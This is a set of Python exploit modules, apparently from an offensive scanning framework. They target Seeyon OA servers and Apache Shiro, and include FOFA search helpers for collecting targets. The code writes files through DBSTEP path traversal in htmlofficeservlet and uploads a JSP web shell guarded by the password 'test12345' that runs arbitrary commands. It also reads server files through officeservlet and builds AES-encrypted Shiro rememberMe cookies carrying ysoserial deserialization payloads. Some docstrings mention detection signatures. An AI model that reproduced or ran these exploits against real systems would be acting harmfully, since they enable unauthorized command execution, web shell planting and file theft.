 async def prove(self) -> None:
     """Probe ``seeyon/htmlofficeservlet`` for file write via a DBSTEP upload.

     Flow: resolve ``self.base_url``, GET the servlet and require the
     ``DBSTEP V3.0`` banner, POST a DBSTEP body whose FILENAME is a
     ``..\\..\\..`` path under ``webapps/seeyon``, then GET the written
     ``testNNNNNN.txt`` back and record a finding in ``self.res`` (and set
     ``self.flag``) if the marker text is echoed.

     The probe file is never removed from the target; the banner string and
     a POST body starting with ``DBSTEP V3.0`` are the observable signature
     a defender can alert on.
     """
     await self.get_url()
     if self.base_url:
         # Custom base64 alphabet consumed by the project's base64encode helper.
         table = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6'
         test_file = 'test' + str(random.randint(100000, 999999)) + '.txt'
         # The encoded FILENAME is a relative path that climbs out of the
         # servlet's own directory (path traversal) into webapps/seeyon.
         base64_file = str(
             base64encode(
                 '..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\{}'.format(
                     test_file), table))
         url = self.base_url + 'seeyon/htmlofficeservlet'
         async with ClientSession() as session:
             async with session.get(url=url) as response:
                 # aiohttp presumably never yields None here; `is not None`
                 # would be the idiomatic spelling.
                 if response != None:
                     text = await response.text()
                     # Banner check: only servlets answering DBSTEP are probed.
                     if 'DBSTEP V3.0' in text:
                         # Fixed DBSTEP envelope; the marker sentence at the end
                         # is what the read-back below looks for.
                         data = '''DBSTEP V3.0     355             0               22             DBSTEP=OKMLlKlV\r\nOPTION=S3WYOSWLBSGr\r\ncurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r\nCREATEDATE=wUghPB3szB3Xwg66\r\nRECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r\noriginalFileId=wV66\r\noriginalCreateDate=wUghPB3szB3Xwg66\r\nFILENAME={}\r\nneedReadFile=yRWZdAS6\r\noriginalCreateDate=wLSGP4oEzLKAz4=iz=66 \r\nthis is a test for me.f82abdd62cce9d2841a6efd5663e7bee'''.format(
                             base64_file)
                         # Upload response is discarded; this `response2` is
                         # shadowed by the read-back request below.
                         async with session.post(url=url,
                                                 data=data) as response2:
                             # print(self.base_url +  'seeyon/' + test_file)
                             # Presumably gives the server time to flush the file.
                             await asyncio.sleep(1)
                         url1 = self.base_url + 'seeyon/' + test_file
                         async with session.get(url=url1) as response2:
                             if response2 != None:
                                 text2 = await response2.text()
                                 if 'this is a test for me' in text2:
                                     self.flag = 1
                                     self.res.append({
                                         "info":
                                         url1,
                                         "key":
                                         'seeyon getshell'
                                     })
 async def upload(self) -> None:
     """Write a ``testNNNNNN.jsp`` page under ``webapps/seeyon`` via the DBSTEP upload.

     Same request sequence as ``prove``: banner check on
     ``seeyon/htmlofficeservlet``, POST of a DBSTEP envelope with a traversal
     FILENAME, then a GET of the new file.  The JSP body embedded in ``data``
     runs the ``cmd`` parameter when ``pwd`` equals the hard-coded
     ``test12345`` and otherwise prints ``:-)``, which is the string the
     read-back checks for.

     The page is left on the target, guarded only by that fixed password, so
     a hit should be treated as a live compromise indicator and cleaned up;
     the ``test<6 digits>.jsp`` name and the ``pwd=test12345`` parameter are
     usable detection signatures.
     """
     await self.get_url()
     if self.base_url:
         # Custom base64 alphabet consumed by the project's base64encode helper.
         table = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6'
         test_file = 'test' + str(random.randint(100000, 999999)) + '.jsp'
         # Relative path that climbs out of the servlet directory (path traversal).
         base64_file = str(
             base64encode(
                 '..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\{}'.format(
                     test_file), table))
         url = self.base_url + 'seeyon/htmlofficeservlet'
         async with ClientSession() as session:
             async with session.get(url=url) as response:
                 # `is not None` would be the idiomatic spelling.
                 if response != None:
                     text = await response.text()
                     if 'DBSTEP V3.0' in text:
                         # DBSTEP envelope followed by the JSP page body.
                         data = '''DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV\r\nOPTION=S3WYOSWLBSGr\r\ncurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r\nCREATEDATE=wUghPB3szB3Xwg66\r\nRECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r\noriginalFileId=wV66\r\noriginalCreateDate=wUghPB3szB3Xwg66\r\nFILENAME=''' + base64_file + '''\r\nneedReadFile=yRWZdAS6\r\noriginalCreateDate=wLSGP4oEzLKAz4=iz=66\r\n<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("test12345".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>c0a4500844f330626a5f11e1563b03f2'''
                         # Upload response is discarded; `response` is rebound here.
                         async with session.post(url=url,
                                                 data=data) as response:
                             # Presumably gives the server time to flush the file.
                             await asyncio.sleep(1)
                         url1 = self.base_url + 'seeyon/' + test_file
                         async with session.get(url=url1) as response1:
                             if response1 != None:
                                 text1 = await response1.text()
                                 # ':-)' is the page's idle output, i.e. it was deployed.
                                 if ':-)' in text1:
                                     self.flag = 1
                                     self.res.append({
                                         "info":
                                         url1 + '?pwd=test12345&cmd=whoami',
                                         "key":
                                         'seeyon getshell'
                                     })
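async def _fofa_api(search, page, flag=True):
    '''
           https://fofa.so/api#auth

    Async generator: yield the first field of every FOFA result for *search*
    over pages ``1..page``, stopping at the first empty page.

    Args:
        search: raw FOFA query; base64-encoded (project ``base64encode``) before sending.
        page: last page number to fetch, inclusive.
        flag: when true, log that the FOFA API is being used.

    Exits the process via ``sys.exit`` when the ``fofa_api`` config section is
    missing or the API answers 401 (``logger.error`` presumably returns None,
    so the exit status is 0 in both cases).
    '''
    url_login = '******'
    try:
        email = conf['fofa_api']['email']
        key = conf['fofa_api']['token']
    except KeyError:
        sys.exit(logger.error("Load tentacle config error: zfofa_api, please check the config in tentacle.conf."))
    if flag:
        logger.sysinfo("Using fofa api...")

    # NOTE(review): if base64encode returns bytes, str() produces "b'...'";
    # the synchronous variant decodes with 'utf-8' instead -- confirm which
    # the helper returns.
    search = str(base64encode(search))

    async with ClientSession() as session:
        for p in range(1, page + 1):
            logger.debug("Find fofa url of %d page..." % p)
            # email and key travel in the query string as the API requires, so
            # the full URL must never be logged: it would leak the token into
            # log files and any intermediate proxy.
            query = url_login + '?email={0}&key={1}&page={2}&qbase64={3}'.format(email, key, p, search)
            async with session.post(url=query) as response:
                if response is None:
                    continue
                if int(response.status) == 401:
                    sys.exit(logger.error("Error fofa api access, maybe you should pay fofa coin and enjoy service."))
                res = await response.text()
                if res is None:
                    continue
                res_json = json.loads(res)
                # An explicit error for this page: skip it, keep paging.
                if res_json.get("error") is not None:
                    continue
                # A missing or empty 'results' list means no more pages; the
                # previous code called len() on it and crashed when absent.
                results = res_json.get('results') or []
                if not results:
                    break
                for item in results:
                    logger.debug("Fofa Found: %s" % item[0])
                    yield item[0]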
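def _fofa_api(search, page, flag=True):
    '''
           https://fofa.so/api#auth

    Return the first field of every FOFA result for *search* over pages
    ``1..page``, stopping early at the first empty page.

    Args:
        search: raw FOFA query; base64-encoded (project ``base64encode``) before sending.
        page: last page number to fetch, inclusive.
        flag: when true, log that the FOFA API is being used.

    Returns:
        list of the first column of each result row.

    Exits the process via ``sys.exit`` when the ``fofa_api`` config section is
    missing or the API answers 401 (``logger.error`` presumably returns None,
    so the exit status is 0 in both cases).
    '''
    url_login = '******'
    result = []
    try:
        email = conf['config']['fofa_api']['email']
        key = conf['config']['fofa_api']['token']
    except KeyError:
        sys.exit(logger.error("Load tentacle config error: zfofa_api, please check the config in tentacle.conf."))
    if flag:
        logger.sysinfo("Using fofa api...")
    search = str(base64encode(bytes(search, 'utf-8')), 'utf-8')
    for p in range(1, page + 1):
        logger.debug("Find fofa url of %d page..." % p)
        # email and key travel in the query string as the API requires, so the
        # full URL must never be logged (it would leak the token).
        query = url_login + '?email={0}&key={1}&page={2}&qbase64={3}'.format(email, key, p, search)
        res = mycurl('post', query)
        if res is None:
            continue
        if int(res.status_code) == 401:
            sys.exit(logger.error("Error fofa api access, maybe you should pay fofa coin and enjoy service."))
        res_json = json.loads(res.text)
        # An explicit error for this page: skip it, keep paging.
        if res_json.get("error") is not None:
            continue
        # A missing or empty 'results' list means no more pages; iterating the
        # raw .get() value crashed when the key was absent, and later pages
        # are empty too, so stop requesting them.
        results = res_json.get('results') or []
        if not results:
            break
        for item in results:
            logger.debug("Fofa Found: %s" % item[0])
            result.append(item[0])
    return result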
 async def download(self) -> None:
     """Read a server-side file through ``seeyon/officeservlet``.

     The path comes from ``self.parameter['file']`` (KeyError if the caller
     did not supply it), is encoded with the project's custom-alphabet
     ``base64encode`` and sent as the DBSTEP ``TEMPLATE`` field.  A finding is
     recorded when the response contains
     ``<res-type>javax.sql.DataSource</res-type>``, i.e. the caller is
     expected to request a container descriptor that declares a data source
     (the response body itself is not stored).
     """
     await self.get_url()
     if self.base_url:
         fn = self.parameter['file']
         # Custom base64 alphabet consumed by the project's base64encode helper.
         table = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6'
         base64_file = str(base64encode(fn, table))
         url = self.base_url + 'seeyon/officeservlet'
         headers = {'Content-Type': 'application/x-www-form-urlencoded'}
         async with ClientSession() as session:
             async with session.get(url=url) as response:
                 # `is not None` would be the idiomatic spelling.
                 if response != None:
                     text = await response.text()
                     # Banner check before sending the DBSTEP request.
                     if 'DBSTEP V3.0' in text:
                         data = '''DBSTEP V3.0     331             0               0               \r\ncurrentUserId=ziCEz4eEz4KuzUK3ziKGwUdszg66\r\nRECORDID=wLKhwLK6\r\nCREATEDATE=wLShwUgsP4o3Pg66\r\noriginalFileId=wV66\r\nneedReadFile=NrMGyV66\r\noriginalCreateDate=wLShwUgsP4o3Pg66\r\nOPTION=LKDxOWOWLlxwVlOW\r\nCOMMAND=BSTLOlMSOCQwOV66\r\nTEMPLATE={}\r\naffairMemberId=wV66\r\naffairMemberName=OKlzLs66'''.format(
                             base64_file)
                         # `response` and `text` are rebound here, shadowing the
                         # banner request above.
                         async with session.post(
                                 url=url, data=data,
                                 headers=headers) as response:
                             if response != None:
                                 text = await response.text()
                                 if '<res-type>javax.sql.DataSource</res-type>' in text:
                                     self.flag = 1
                                     self.res.append({
                                         "info":
                                         url,
                                         "key":
                                         'seeyon download'
                                     })
 def get_aes_cipher_cookie(self, text, key):
     """Return a ``rememberMe=`` cookie holding *text* AES-CBC-encrypted under *key*.

     Both arguments pass through the project's ``base64decode`` first.  The
     plaintext is PKCS#7-padded, a fresh random IV is prepended to the
     ciphertext, and the result is base64-encoded.  Note the value is built
     with ``str(...)``; if ``base64encode`` returns bytes the cookie would
     read ``rememberMe=b'...'`` -- confirm against the helper.
     """
     block = AES.block_size

     def pkcs7(buf):
         # Always append at least one byte; a full block when already aligned.
         fill = block - len(buf) % block
         return buf + (chr(fill) * fill).encode()

     iv = uuid.uuid4().bytes  # 16 random bytes, exactly one AES block
     cipher = AES.new(base64decode(key), AES.MODE_CBC, iv)
     sealed = iv + cipher.encrypt(pkcs7(base64decode(text)))
     encoded = base64encode(sealed)
     return "rememberMe=" + str(encoded)
 def encode_rememberme(self, command, key) -> str:
     """Build a ``rememberMe=`` cookie whose plaintext is a ysoserial JRMPClient payload for *command*.

     The payload bytes are read from the stdout of the bundled ysoserial jar,
     PKCS#7-padded, AES-CBC encrypted under the base64-decoded *key* with a
     random IV, and ``IV || ciphertext`` is base64-encoded.  Such a cookie is
     only accepted by a server that shares *key*; a per-deployment random
     key is the mitigation.
     """
     # NOTE(review): the child process is never waited on and its stdout pipe
     # is not closed; a `with subprocess.Popen(...)` block would release both.
     popen = subprocess.Popen([
         'java', '-jar', 'tool/ysoserial-0.0.6-SNAPSHOT-all.jar',
         'JRMPClient', command
     ],
                              stdout=subprocess.PIPE)
     BS = AES.block_size
     # PKCS#7: append n bytes of value n so the length becomes a block multiple.
     pad = lambda s: s + (
         (BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
     mode = AES.MODE_CBC
     iv = uuid.uuid4().bytes  # 16 random bytes, exactly one AES block
     encryptor = AES.new(base64decode(key), mode, iv)
     # Reads the whole payload; an empty read (jar missing) still encrypts fine.
     file_body = pad(popen.stdout.read())
     base64_ciphertext = base64encode(iv + encryptor.encrypt(file_body))
     # If base64encode returns bytes, str() yields "b'...'" -- confirm the helper.
     return "rememberMe=" + str(base64_ciphertext)